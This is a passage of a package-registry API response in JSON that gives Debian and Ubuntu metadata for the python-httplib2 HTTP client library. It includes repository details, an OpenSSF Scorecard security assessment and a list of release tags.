api/v1/registries/ubuntu-23.04/packages/python-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/python-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/python-httplib2/codemeta","maintainers":[],"registry":{"name":"ubuntu-23.04","url":"https://launchpad.net/ubuntu/lunar","ecosystem":"ubuntu","default":false,"packages_count":36116,"maintainers_count":0,"namespaces_count":4,"keywords_count":999,"github":"ubuntu","metadata":{"codename":"lunar","mirror":"http://old-releases.ubuntu.com/ubuntu","funded_packages_count":1108},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:49.117Z","updated_at":"2026-08-25T05:06:52.544Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/namespaces"}},{"id":13664746,"name":"python-httplib2","ecosystem":"debian","description":null,"homepage":"https://github.com/httplib2/httplib2","licenses":"other","normalized_licenses":[],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["libs"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-12T10:22:41.891Z","latest_release_published_at":"2026-02-12T10:22:41.891Z","latest_release_number":"0.22.0-1","last_synced_at":"2026-03-14T09:06:26.769Z","created_at":"2026-02-12T10:22:41.624Z","updated_at":"2026-08-22T21:43:00.383Z","registry_url":"https://tracker.debian.org/pkg/python-httplib2","install_command":"apt-get install python-httplib2","documentation_url":"https://packages.debian.org/trixie/python-httplib2","metadata":{"component":"main","architecture":"all","priority":"source","binary":"python3-httplib2","standards_version":"4.6.2","maintainer":"Debian Python Team \u003cteam+python@tracker.debian.org\u003e","build_depends":"ca-certificates, debhelper-compat (= 13), dh-sequence-python3, pybuild-plugin-pyproject, python3-all, python3-cryptography \u003c!nocheck\u003e, python3-pyparsing \u003c!nocheck\u003e, python3-pytest \u003c!nocheck\u003e, python3-pytest-timeout \u003c!nocheck\u003e, python3-six \u003c!nocheck\u003e, python3-setuptools","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/re